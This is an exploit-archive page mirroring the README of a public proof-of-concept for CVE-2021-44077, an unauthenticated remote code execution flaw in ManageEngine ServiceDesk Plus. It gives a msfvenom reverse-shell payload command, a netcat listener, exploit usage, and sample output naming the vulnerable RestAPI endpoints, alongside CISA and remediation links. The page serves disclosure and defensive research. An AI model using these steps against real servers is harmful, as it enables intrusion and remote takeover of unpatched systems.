Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-44077 PoC — ZOHO ManageEngine ServiceDesk Plus 访问控制错误漏洞

Source
https://github.com/horizon3ai/CVE-2021-44077
Associated Vulnerability
Title:ZOHO ManageEngine ServiceDesk Plus 访问控制错误漏洞 (CVE-2021-44077)
Description:Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution. This is related to /RestAPI URLs in a servlet, and ImportTechnicians in the Struts configuration.
Description
Proof of Concept Exploit for ManageEngine ServiceDesk Plus CVE-2021-44077
Readme
# CVE-2021-44077
Proof of Concept Exploit for CVE-2021-44077: PreAuth RCE in ManageEngine ServiceDesk Plus < 11306

Based on:
- https://xz.aliyun.com/t/10631

CISA Advisory:
- https://www.cisa.gov/uscert/ncas/alerts/aa21-336a

Remediation (Update to build 11306 or later):
- https://www.manageengine.com/products/service-desk/security-response-plan.html

Tested on ManageEngine ServiceDesk Plus Build 11303. Disabled all AV.

## Usage

The exploit uploads a Windows executable to the target and executes it.

To exploit, first generate any executable. For instance:

```
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.140 LPORT=4444 -f exe > msiexec.exe
```

`pip install` the requirements file or make sure you've got the `requests` package.

If you're trying to catch a reverse shell, run your listener first, e.g.

```
nc -l 4444
```

Then run the exploit script, passing in the `url` and `exe` arguments, e.g.

```
python exploit.py http://<TARGET>:<PORT> <path_to_exe>
```

Example script output:

```
% python exploit.py http://192.168.0.140:8080 msiexec.exe
[+] Target: http://192.168.0.140:8080/
[+] Executable: msiexec.exe
[+] Uploading msiexec.exe to http://192.168.0.140:8080/RestAPI/ImportTechnicians?step=1
[+] Got 401 error code on upload. This is expected.
[+] Uploaded msiexec.exe
[+] Attempting to invoke against url http://192.168.0.140:8080/./RestAPI/s247action. Waiting up to 20 seconds...
[+] Done, did it work?
```

![Proof](proof.png)


## Exploit Notes

- The vulnerability you to upload any file to the install `bin` directory, including existing files such as batch scripts. There may be other ways to invoke the uploaded file.
- Directly uploading a web shell seems to be prevented by a filter.

## Disclaimer

This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.
File Snapshot

 [4.0K]  /data/pocs/77ab4e570d0c8d703d5c92407f978030b745a731
├── [2.0K]  exploit.py
├── [342K]  proof.png
├── [2.0K]  README.md
└── [  88]  requirements.txt

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →